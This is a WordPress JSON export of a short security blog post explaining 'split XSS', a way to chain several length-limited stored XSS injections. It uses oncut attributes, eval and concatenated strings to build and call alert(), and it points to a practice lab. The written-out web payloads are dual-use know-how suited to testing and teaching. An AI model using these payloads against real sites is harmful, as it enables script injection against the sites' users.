{"id":457,"date":"2021-06-12T17:00:46","date_gmt":"2021-06-12T17:00:46","guid":{"rendered":"https:\/\/lyhinslab.org\/?p=457"},"modified":"2021-06-12T17:00:46","modified_gmt":"2021-06-12T17:00:46","slug":"lifehacks-for-hackers-split-xss","status":"publish","type":"post","link":"https:\/\/lscp.llc\/index.php\/2021\/06\/12\/lifehacks-for-hackers-split-xss\/","title":{"rendered":"Lifehacks for hackers: Split XSS"},"content":{"rendered":"\n

In case of multiple Stored XSS with the strict size limitation \u2013 consider the following exploitation technique; it would work, even if the size limit doesn\u2019t allow an injection of a single alert() function.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

The base PoC<\/h3>\n\n\n\n

Firstly, inject JavaScript. Tag injection would look like this:<\/p>\n\n\n\n

<script>x=\"\"<\/pre>\n\n\n\n
To inject in tag attribute, consider:<\/p>\n\n\n\n
\"oncut=x=\"<\/pre>\n\n\n\n
The injection in JavaScript would look like this:<\/p>\n\n\n\n
;x=\"\";<\/pre>\n\n\n\n
Change the value of any variable to “”, then verify its value in Debugger Watch.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
At this point, this issue has no more than Informational severity (P5). But the issue definitely exists, provides opportunities to take control, and therefore should be mentioned.<\/p>\n\n\n\n
Payload creation<\/h3>\n\n\n\n
The “alert()” function, that use to proof XSS issues all the time, requires 7 characters; the more valuable functions  like “$.getScript()” require even more characters. In case of 6 chars upper limit – create a custom payload as below.<\/p>\n\n\n\n
e=eval\nx='al'\nx+='e'\nx+='r'\nx+='t'\ne(x)()<\/pre>\n\n\n\n
Optimization<\/h3>\n\n\n\n
In case the target web application helps with completing the HTML syntax – the process could be more efficient. <\/p>\n\n\n\n
\"oncut=\"e=eval\n\"oncut=x=\"aler\n\"oncut=x+=\"t\n\"oncut=\"e(x)()<\/pre>\n\n\n\n
Reduce the Human Factor<\/h3>\n\n\n\n
If user acts in an unpredictable order – consider adding of more variables, so the user would not be able to break the exploitation flow.<\/p>\n\n\n\n
\"oncut=\"e=eval\n\"oncut=b=\"ale\n\"oncut=c=\"rt\n\"oncut=\"a=b+c\n\"oncut=\"e(a)()<\/pre>\n\n\n\n
Try this technique:
https:\/\/splitxsslab.digi.ninja\/index.php<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
In case of multiple Stored XSS with the strict size limitation \u2013 consider the following exploitation technique; it would work, even […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-457","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/posts\/457","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/comments?post=457"}],"version-history":[{"count":0,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/posts\/457\/revisions"}],"wp:attachment":[{"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/media?parent=457"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/categories?post=457"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lscp.llc\/index.php\/wp-json\/wp\/v2\/tags?post=457"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}